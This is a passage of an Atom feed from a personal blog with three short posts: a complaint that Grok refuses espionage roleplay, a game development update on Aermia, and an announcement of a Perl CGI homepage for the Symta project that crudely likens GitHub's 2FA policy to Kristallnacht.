&lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>What happened to the Based(tm) AI?</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:360233</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/360233.html' />
    <issued>2026-05-27T10:48:00</issued>
    <modified>2026-05-27T08:48:45Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>Why can&apos;t Grok explore even the basic espionage roleplaying?&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/nhxVjAz.png&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/360233.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/360233&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>The Eight Paths of Aermia</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:360043</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/360043.html' />
    <issued>2026-05-26T17:32:00</issued>
    <modified>2026-05-26T15:34:24Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <category term='gamedev' />
    <content type='text/html' mode='escaped'>Original: &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/the-worlds-of-aermia&quot;&gt;https://aermia.com/u/NancySadkov/p/t&lt;wbr /&gt;he-worlds-of-aermia&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Not dead yet! development is still in progress.&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/z4ZLhgr.png&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/360043.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/360043&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Look ma! My first Perl5 CGI site!!</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:359776</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/359776.html' />
    <issued>2026-05-23T18:34:00</issued>
    <modified>2026-05-23T16:35:47Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>Symta got a personal homepage &lt;br /&gt;&lt;a href=&quot;https://symta.aermia.com/&quot;&gt;https://symta.aermia.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;because github went nazi with 2FA.&lt;br /&gt;We can recover from a broken window.&lt;br /&gt;But we wont survive the kristallnacht.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/BEiZx94.png&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/359776.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/359776&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
</feed>
